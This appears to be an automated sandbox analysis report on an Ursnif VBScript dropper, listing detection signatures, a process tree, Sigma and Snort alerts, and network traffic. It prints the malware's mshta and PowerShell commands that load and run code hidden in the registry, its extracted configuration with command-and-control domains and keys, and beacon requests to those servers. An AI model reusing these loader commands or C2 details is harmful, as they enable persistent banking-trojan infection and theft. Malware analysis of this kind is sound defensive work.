Loading ...

Play interactive tourEdit tour

Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name:start[526268].vbs
Analysis ID:480986
MD5:b0de0a696f7b17724fef5c5e0af2bd1d
SHA1:3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256:e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5464 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 5832 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 5004 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 3128 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • WmiPrvSE.exe (PID: 5336 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 4088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 1956 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4216 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4624 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
          00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            Click to see the 11 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            34.3.rundll32.exe.566a4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              34.3.rundll32.exe.5718d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                34.3.rundll32.exe.566a4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  34.3.rundll32.exe.5718d48.2.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                    34.3.rundll32.exe.56e94a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Encoded IEXShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: MSHTA Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: Mshta Spawning Windows ShellShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4216, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline', ProcessId: 4624
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132757561457280033.4216.DefaultAppDomain.powershell

                      Data Obfuscation:

                      barindex
                      Sigma detected: Powershell run code from registryShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1956, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4216

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
                      Antivirus detection for URL or domainShow sources
                      Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZuAvira URL Cloud: Label: malware
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: atl.bigbigpoppa.comVirustotal: Detection: 8%Perma Link
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80
                      Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
                      Source: Joe Sandbox ViewIP Address: 185.251.90.253 185.251.90.253
                      Source: global trafficHTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Sep 2021 05:02:45 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
